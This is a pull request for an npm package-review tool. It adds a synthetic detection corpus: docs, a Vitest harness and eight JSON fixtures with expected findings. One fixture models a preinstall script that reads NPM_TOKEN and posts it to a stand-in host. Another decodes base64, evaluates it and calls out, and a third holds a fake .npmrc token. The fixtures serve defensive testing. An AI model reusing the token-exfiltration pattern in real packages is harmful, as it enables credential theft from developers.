### PR TITLE
Add security detection corpus foundation

### DIFF
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ This repository is moving from prototype to real product. The current implementa
 - **Safe artifact defaults.** Do not retain raw tarballs by default in SaaS. Persist redacted summaries, manifests, diffs, findings, and report metadata. Raw artifact retention may become an explicit short-TTL organization setting later.
 - **Signed reports later.** Prepare report data to be canonical and signable, but do not launch public signed report generation yet.
 
-See [`docs/architecture.md`](docs/architecture.md), [`docs/security-model.md`](docs/security-model.md), [`docs/production-roadmap.md`](docs/production-roadmap.md), [`docs/cost-model.md`](docs/cost-model.md), and [`docs/test-package.md`](docs/test-package.md) for the production plan, budget napkin math, and staged-publish test package.
+See [`docs/architecture.md`](docs/architecture.md), [`docs/security-model.md`](docs/security-model.md), [`docs/security-detection-corpus.md`](docs/security-detection-corpus.md), [`docs/production-roadmap.md`](docs/production-roadmap.md), [`docs/cost-model.md`](docs/cost-model.md), and [`docs/test-package.md`](docs/test-package.md) for the production plan, detection corpus notes, budget napkin math, and staged-publish test package.
 
 ## Current capabilities
 

--- a/docs/production-roadmap.md
+++ b/docs/production-roadmap.md
@@ -228,7 +228,7 @@ Goals:
 
 Tasks:
 
-- Build a golden fixture corpus of benign and malicious npm package patterns.
+- Expand the golden fixture corpus of benign and malicious npm package patterns. The initial safe synthetic corpus and research notes live in [`security-detection-corpus.md`](./security-detection-corpus.md).
 - Add continuous deterministic-rule and AI-prompt evals.
 - Add tests for malformed AI JSON and prompt-injection-like package contents.
 - Add archive parser fuzzing or property-based tests.

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -1,0 +1,79 @@
+# Security detection corpus
+
+Drydock's deterministic findings are the authoritative review signal while AI review is disabled. The detection corpus exists to make those findings measurable: every rule change should be checked against small, reviewable package scenarios with explicit expected rule IDs, severities, and risk.
+
+This is a **safe synthetic corpus**, not a malware zoo. It captures techniques observed in npm supply-chain research without vendoring live malicious packages, encrypted malware archives, real credentials, or customer artifacts.
+
+## Research basis
+
+The fixture taxonomy is based on the current Drydock rule surface plus public npm malware research:
+
+- [OpenSSF malicious-packages](https://github.com/ossf/malicious-packages) publishes OSV-format reports and explicitly scopes in typosquatting, account takeover, malicious prebuilt binaries, dependency confusion, and manifest confusion. It also warns that telemetry, obfuscation, and protestware need context before they are treated as malicious.
+- [OpenSSF Package Analysis](https://github.com/ossf/package-analysis) tracks package behavior by asking what files packages access, what addresses they connect to, and what commands they run. Its public case studies are useful for behavior taxonomy, but Drydock should not execute packages.
+- [Datadog's malicious-software-packages-dataset](https://github.com/DataDog/malicious-software-packages-dataset/) is human-triaged and useful for taxonomy validation, but its samples are actively malicious and distributed as encrypted `infected` archives. Do not copy those samples into this repository.
+- Recent npm detection benchmark research reports a curated dataset of 6,420 malicious and 7,288 benign npm packages, with 11 behavior categories and 8 evasion categories. The most common behaviors were command execution, data collection, and data exfiltration; install scripts were used by about 72% of malicious packages in that study, and preinstall hooks were the dominant install-time entry point.
+- The same benchmark highlights the central detection trade-off: benign and malicious packages often call the same APIs. A single `process.env` or `https` use is capability evidence, while chains such as collect → serialize → exfiltrate are stronger intent evidence.
+
+## Safety policy
+
+Corpus fixtures must follow the same artifact-retention posture as production scans:
+
+- Use synthetic `FileRecord` JSON, not raw tarballs.
+- Use `example.invalid` for URLs.
+- Use obviously fake secrets only when testing redaction/secret rules.
+- Do not include runnable malware, live C2 endpoints, exploit payloads, encrypted samples, or proprietary package bytes.
+- Keep fixtures minimal enough that reviewers can understand why each expected finding exists.
+
+## Fixture format
+
+Fixtures live under `test/fixtures/security-corpus/cases/*.json` and are evaluated by `test/security-corpus.test.mjs`.
+
+Required fields:
+
+- `id` — stable fixture identifier.
+- `title` — human-readable scenario.
+- `category` — taxonomy bucket.
+- `intent` — what behavior the fixture is meant to protect.
+- `stagedFiles` — sandbox-shaped `FileRecord[]` for the staged package.
+- `expectedRisk` — expected deterministic risk from `computeRisk()`.
+- `expectedFindings` — exact expected `{ ruleId, severity, file }` entries.
+
+Optional fields:
+
+- `previousFiles` — previous-version `FileRecord[]`; defaults to empty.
+- `previousPackageJson` / `stagedPackageJson` — summaries for package-json diff assertions and deterministic manifest review.
+- `expectedPackageJsonDiff` — assertions for diff-only signals.
+- `coverageGaps` — signals represented in the fixture but not yet promoted to deterministic findings.
+
+The test intentionally compares exact rule IDs, severities, files, and risk. If a rule change is intentional, update the fixture expectation in the same PR and explain why.
+
+## Initial taxonomy
+
+The first corpus slice covers:
+
+- benign version bump control;
+- preinstall credential/environment collection with command and network capability;
+- implicit `node-gyp rebuild` from root `binding.gyp` plus native artifact review;
+- base64/dynamic evaluation plus network-capable code;
+- secret-looking file addition;
+- large opaque binary addition;
+- malformed `package.json` parse failure;
+- dependency and entrypoint package-json diff changes that are currently tracked as coverage gaps.
+
+## Known coverage gaps
+
+The corpus deliberately records some product gaps instead of hiding them:
+
+- Dependency additions and unusual specs are visible in `packageJsonDiff`, but they do not yet raise deterministic findings or risk.
+- Entrypoint changes are visible in `packageJsonDiff`, but they do not yet raise deterministic findings or risk.
+- Maintainer/package transfer signals, new publisher signals, package reputation, and OpenSSF/package intelligence integrations are not implemented.
+- Behavior-chain detection is regex-based and does not yet prove source-to-sink intent.
+- Anti-analysis and environment-detection patterns are not deeply modeled because Drydock intentionally avoids package execution.
+
+## Adding fixtures
+
+1. Add a new JSON file under `test/fixtures/security-corpus/cases/`.
+2. Keep the fixture synthetic and minimal.
+3. Add exact expected findings and risk.
+4. If the scenario is important but not yet detected, add `coverageGaps` and assert the current diff-only behavior where possible.
+5. Run `pnpm run test:node -- security-corpus.test.mjs` before opening the PR.

--- a/test/fixtures/security-corpus/README.md
+++ b/test/fixtures/security-corpus/README.md
@@ -1,0 +1,12 @@
+# Security detection corpus fixtures
+
+This directory contains Drydock's synthetic golden corpus for deterministic npm staged-publish review.
+
+- Fixtures are intentionally small JSON documents, not tarballs and not real malware.
+- `stagedFiles` and `previousFiles` use the same `FileRecord` shape returned by the sandbox.
+- `expectedFindings` names the exact deterministic rule IDs, severities, and files expected today.
+- `expectedRisk` records the expected deterministic risk from those findings.
+- Optional `expectedPackageJsonDiff` assertions cover diff surfaces that may not yet produce findings.
+- `coverageGaps` records intentional blind spots so future rule work can promote them into findings.
+
+Do not vendor live malicious packages, encrypted malware archives, real credentials, or raw customer package bytes here. Use synthetic `example.invalid` endpoints and obviously fake secrets only.

--- a/test/fixtures/security-corpus/cases/benign-minimal.json
+++ b/test/fixtures/security-corpus/cases/benign-minimal.json
@@ -1,0 +1,50 @@
+{
+  "id": "benign-minimal",
+  "title": "Small version bump with unchanged runtime code",
+  "category": "benign-control",
+  "intent": "Keep a low-risk control case in the corpus so broad rules cannot silently start flagging ordinary package changes.",
+  "previousPackageJson": {
+    "name": "benign-minimal",
+    "version": "1.0.0",
+    "main": "index.js"
+  },
+  "stagedPackageJson": {
+    "name": "benign-minimal",
+    "version": "1.0.1",
+    "main": "index.js"
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 63,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"benign-minimal\",\"version\":\"1.0.0\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 26,
+      "sha256": "index-v1",
+      "flags": [],
+      "textSample": "export const answer = 42;\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 63,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"benign-minimal\",\"version\":\"1.0.1\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 26,
+      "sha256": "index-v1",
+      "flags": [],
+      "textSample": "export const answer = 42;\n"
+    }
+  ],
+  "expectedRisk": "low",
+  "expectedFindings": []
+}

--- a/test/fixtures/security-corpus/cases/dependency-entrypoint-diff-only.json
+++ b/test/fixtures/security-corpus/cases/dependency-entrypoint-diff-only.json
@@ -1,0 +1,78 @@
+{
+  "id": "dependency-entrypoint-diff-only",
+  "title": "Dependency specs and entrypoints change without direct code indicators",
+  "category": "package-json-diff-coverage-gap",
+  "intent": "Track release-review-sensitive package.json changes that are currently diff-only and should become richer findings later.",
+  "coverageGaps": [
+    "unusual dependency specs are visible in packageJsonDiff but do not yet raise deterministic findings",
+    "entrypoint changes are visible in packageJsonDiff but do not yet raise deterministic findings"
+  ],
+  "previousPackageJson": {
+    "name": "dependency-entrypoint-diff-only",
+    "version": "1.0.0",
+    "main": "index.js",
+    "dependencies": {
+      "left-pad": "1.3.0"
+    }
+  },
+  "stagedPackageJson": {
+    "name": "dependency-entrypoint-diff-only",
+    "version": "1.0.1",
+    "main": "dist/index.js",
+    "exports": "./dist/index.js",
+    "dependencies": {
+      "left-pad": "github:someone/left-pad#main",
+      "@scope/native": "npm:totally-safe@^1.0.0"
+    }
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 119,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"dependency-entrypoint-diff-only\",\"version\":\"1.0.0\",\"main\":\"index.js\",\"dependencies\":{\"left-pad\":\"1.3.0\"}}"
+    },
+    {
+      "path": "index.js",
+      "size": 18,
+      "sha256": "index-v1",
+      "flags": [],
+      "textSample": "export default 1;\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 194,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"dependency-entrypoint-diff-only\",\"version\":\"1.0.1\",\"main\":\"dist/index.js\",\"exports\":\"./dist/index.js\",\"dependencies\":{\"left-pad\":\"github:someone/left-pad#main\",\"@scope/native\":\"npm:totally-safe@^1.0.0\"}}"
+    },
+    {
+      "path": "dist/index.js",
+      "size": 18,
+      "sha256": "index-v2",
+      "flags": [],
+      "textSample": "export default 1;\n"
+    }
+  ],
+  "expectedRisk": "low",
+  "expectedFindings": [],
+  "expectedPackageJsonDiff": {
+    "entrypointsChanged": true,
+    "dependencies": [
+      {
+        "key": "@scope/native",
+        "status": "added",
+        "staged": "npm:totally-safe@^1.0.0"
+      },
+      {
+        "key": "left-pad",
+        "status": "modified",
+        "previous": "1.3.0",
+        "staged": "github:someone/left-pad#main"
+      }
+    ]
+  }
+}

--- a/test/fixtures/security-corpus/cases/implicit-node-gyp-native.json
+++ b/test/fixtures/security-corpus/cases/implicit-node-gyp-native.json
@@ -1,0 +1,58 @@
+{
+  "id": "implicit-node-gyp-native",
+  "title": "Root binding.gyp creates npm's implicit node-gyp install hook and ships a native addon",
+  "category": "native-install-surface",
+  "intent": "Track npm's implicit install behavior and native artifact review signal.",
+  "previousPackageJson": {
+    "name": "implicit-node-gyp-native",
+    "version": "1.0.0"
+  },
+  "stagedPackageJson": {
+    "name": "implicit-node-gyp-native",
+    "version": "1.0.1"
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 53,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"implicit-node-gyp-native\",\"version\":\"1.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 53,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"implicit-node-gyp-native\",\"version\":\"1.0.1\"}"
+    },
+    {
+      "path": "binding.gyp",
+      "size": 2,
+      "sha256": "binding-gyp",
+      "flags": [],
+      "textSample": "{}"
+    },
+    {
+      "path": "prebuilds/linux-x64/addon.node",
+      "size": 2048,
+      "sha256": "native-addon",
+      "flags": ["binary"]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "install-script.implicit-node-gyp",
+      "severity": "high",
+      "file": "binding.gyp"
+    },
+    {
+      "ruleId": "file.native-artifact",
+      "severity": "high",
+      "file": "prebuilds/linux-x64/addon.node"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/large-binary-added.json
+++ b/test/fixtures/security-corpus/cases/large-binary-added.json
@@ -1,0 +1,51 @@
+{
+  "id": "large-binary-added",
+  "title": "Large opaque binary is added to the package",
+  "category": "binary-review",
+  "intent": "Keep manual-review pressure on large opaque artifacts even when they are not native extensions by filename.",
+  "previousPackageJson": {
+    "name": "large-binary-added",
+    "version": "1.0.0"
+  },
+  "stagedPackageJson": {
+    "name": "large-binary-added",
+    "version": "1.0.1"
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 51,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"large-binary-added\",\"version\":\"1.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 51,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"large-binary-added\",\"version\":\"1.0.1\"}"
+    },
+    {
+      "path": "vendor/tool.bin",
+      "size": 3145728,
+      "sha256": "large-binary",
+      "flags": ["binary"]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "file.large-binary",
+      "severity": "high",
+      "file": "vendor/tool.bin"
+    },
+    {
+      "ruleId": "diff.large-new-file",
+      "severity": "medium",
+      "file": "vendor/tool.bin"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/obfuscated-dynamic-fetch.json
+++ b/test/fixtures/security-corpus/cases/obfuscated-dynamic-fetch.json
@@ -1,0 +1,54 @@
+{
+  "id": "obfuscated-dynamic-fetch",
+  "title": "Added file decodes base64, evaluates code, and performs a fetch",
+  "category": "obfuscation-network",
+  "intent": "Cover dynamic evaluation and network-capable code in a newly added file without carrying a real payload.",
+  "previousPackageJson": {
+    "name": "obfuscated-dynamic-fetch",
+    "version": "1.0.0",
+    "main": "index.js"
+  },
+  "stagedPackageJson": {
+    "name": "obfuscated-dynamic-fetch",
+    "version": "1.0.1",
+    "main": "index.js"
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 72,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"obfuscated-dynamic-fetch\",\"version\":\"1.0.0\",\"main\":\"index.js\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 72,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"obfuscated-dynamic-fetch\",\"version\":\"1.0.1\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "dist/payload.js",
+      "size": 151,
+      "sha256": "payload-js",
+      "flags": [],
+      "textSample": "const code = Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString('utf8');\neval(code);\nfetch('https://example.invalid/pixel');\n"
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "code.network-access",
+      "severity": "high",
+      "file": "dist/payload.js"
+    },
+    {
+      "ruleId": "code.dynamic-evaluation",
+      "severity": "high",
+      "file": "dist/payload.js"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/package-json-parse-failed.json
+++ b/test/fixtures/security-corpus/cases/package-json-parse-failed.json
@@ -1,0 +1,31 @@
+{
+  "id": "package-json-parse-failed",
+  "title": "Malformed package.json prevents complete manifest review",
+  "category": "manifest-parse-failure",
+  "intent": "Ensure malformed manifests fail closed into manual review rather than silently passing lifecycle/dependency checks.",
+  "previousFiles": [],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 9,
+      "sha256": "bad-package-json",
+      "flags": [],
+      "textSample": "{not-json"
+    },
+    {
+      "path": "binding.gyp",
+      "size": 2,
+      "sha256": "binding-gyp",
+      "flags": [],
+      "textSample": "{}"
+    }
+  ],
+  "expectedRisk": "medium",
+  "expectedFindings": [
+    {
+      "ruleId": "package-json.parse-failed",
+      "severity": "medium",
+      "file": "package.json"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/preinstall-env-exfil.json
+++ b/test/fixtures/security-corpus/cases/preinstall-env-exfil.json
@@ -1,0 +1,65 @@
+{
+  "id": "preinstall-env-exfil",
+  "title": "Preinstall hook reads environment data and sends it over the network",
+  "category": "lifecycle-credential-exfiltration",
+  "intent": "Model the common install-time collect-and-exfiltrate chain without embedding a working endpoint or real secret.",
+  "previousPackageJson": {
+    "name": "preinstall-env-exfil",
+    "version": "1.0.0"
+  },
+  "stagedPackageJson": {
+    "name": "preinstall-env-exfil",
+    "version": "1.0.1",
+    "scripts": {
+      "preinstall": "node install.js"
+    }
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 48,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"preinstall-env-exfil\",\"version\":\"1.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 91,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"preinstall-env-exfil\",\"version\":\"1.0.1\",\"scripts\":{\"preinstall\":\"node install.js\"}}"
+    },
+    {
+      "path": "install.js",
+      "size": 233,
+      "sha256": "install-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\nconst https = require('https');\nconst payload = JSON.stringify({ value: process.env.NPM_TOKEN });\nexecSync('echo preparing');\nhttps.request('https://example.invalid/collect').end(payload);\n"
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    {
+      "ruleId": "install-script.preinstall",
+      "severity": "critical",
+      "file": "package.json"
+    },
+    {
+      "ruleId": "code.process-execution",
+      "severity": "high",
+      "file": "install.js"
+    },
+    {
+      "ruleId": "code.network-access",
+      "severity": "high",
+      "file": "install.js"
+    },
+    {
+      "ruleId": "code.credential-access",
+      "severity": "high",
+      "file": "install.js"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/secret-file-added.json
+++ b/test/fixtures/security-corpus/cases/secret-file-added.json
@@ -1,0 +1,52 @@
+{
+  "id": "secret-file-added",
+  "title": "Package accidentally includes an .npmrc-looking credential file",
+  "category": "secret-retention",
+  "intent": "Ensure secret-looking files remain critical findings. The token string is synthetic and non-functional.",
+  "previousPackageJson": {
+    "name": "secret-file-added",
+    "version": "1.0.0"
+  },
+  "stagedPackageJson": {
+    "name": "secret-file-added",
+    "version": "1.0.1"
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 50,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"secret-file-added\",\"version\":\"1.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 50,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"secret-file-added\",\"version\":\"1.0.1\"}"
+    },
+    {
+      "path": ".npmrc",
+      "size": 68,
+      "sha256": "npmrc-secret",
+      "flags": [],
+      "textSample": "//registry.npmjs.org/:_authToken=npm_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    {
+      "ruleId": "file.secret-content",
+      "severity": "critical",
+      "file": ".npmrc"
+    },
+    {
+      "ruleId": "diff.credential-file-added",
+      "severity": "critical",
+      "file": ".npmrc"
+    }
+  ]
+}

--- a/test/security-corpus.test.mjs
+++ b/test/security-corpus.test.mjs
@@ -1,0 +1,62 @@
+import { readdirSync, readFileSync } from "node:fs";
+import { fileURLToPath } from "node:url";
+import { dirname, join } from "node:path";
+import { describe, expect, test } from "vitest";
+import {
+  computeRisk,
+  createPackageDiff,
+  deterministicFindings,
+  DETERMINISTIC_RULES_VERSION,
+  summarizePackageJsonDiff,
+} from "../server/lib/review.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const casesDir = join(__dirname, "fixtures/security-corpus/cases");
+const cases = readdirSync(casesDir)
+  .filter((file) => file.endsWith(".json"))
+  .sort()
+  .map((file) => JSON.parse(readFileSync(join(casesDir, file), "utf8")));
+
+function comparableFindings(findings) {
+  return findings
+    .map((finding) => ({
+      ruleId: finding.ruleId,
+      severity: finding.severity,
+      file: finding.file,
+    }))
+    .sort((a, b) =>
+      `${a.ruleId}:${a.severity}:${a.file}`.localeCompare(`${b.ruleId}:${b.severity}:${b.file}`),
+    );
+}
+
+describe("security detection golden corpus", () => {
+  test("corpus contains unique fixture IDs", () => {
+    expect(cases.length).toBeGreaterThan(0);
+    expect(new Set(cases.map((fixture) => fixture.id)).size).toBe(cases.length);
+  });
+
+  for (const fixture of cases) {
+    test(`${fixture.id}: ${fixture.title}`, () => {
+      const previousFiles = fixture.previousFiles ?? [];
+      const stagedFiles = fixture.stagedFiles ?? [];
+      const diff = createPackageDiff(previousFiles, stagedFiles);
+      const findings = deterministicFindings(stagedFiles, diff, fixture.stagedPackageJson);
+
+      expect(computeRisk(findings)).toBe(fixture.expectedRisk);
+      expect(comparableFindings(findings)).toEqual(
+        comparableFindings(fixture.expectedFindings ?? []),
+      );
+      for (const finding of findings) {
+        expect(finding.ruleVersion).toBe(DETERMINISTIC_RULES_VERSION);
+      }
+
+      if (fixture.expectedPackageJsonDiff) {
+        const packageJsonDiff = summarizePackageJsonDiff(
+          fixture.previousPackageJson,
+          fixture.stagedPackageJson,
+        );
+        expect(packageJsonDiff).toMatchObject(fixture.expectedPackageJsonDiff);
+      }
+    });
+  }
+});


### PR DESCRIPTION
## Summary

- Add a safe synthetic security detection corpus with eight npm staged-publish scenarios.
- Add a Vitest golden-corpus eval that checks deterministic rule IDs, severities, files, rule version metadata, package-json diff assertions, and computed risk.
- Document the corpus research basis, safety policy, fixture format, initial taxonomy, and known coverage gaps.

## Research notes

The corpus design is based on OpenSSF malicious-package reports, OpenSSF Package Analysis behavior categories, Datadog's human-triaged malicious package dataset safety warnings, and recent npm malware benchmark research around lifecycle hook abuse, command/data-exfiltration chains, and the capability-vs-intent detection trade-off.

## Safety

Fixtures are synthetic JSON `FileRecord` inputs only. No live malware, encrypted malware archives, real credentials, raw tarballs, or customer package bytes are vendored.

## Verification

- `pnpm run verify`

Closes #48
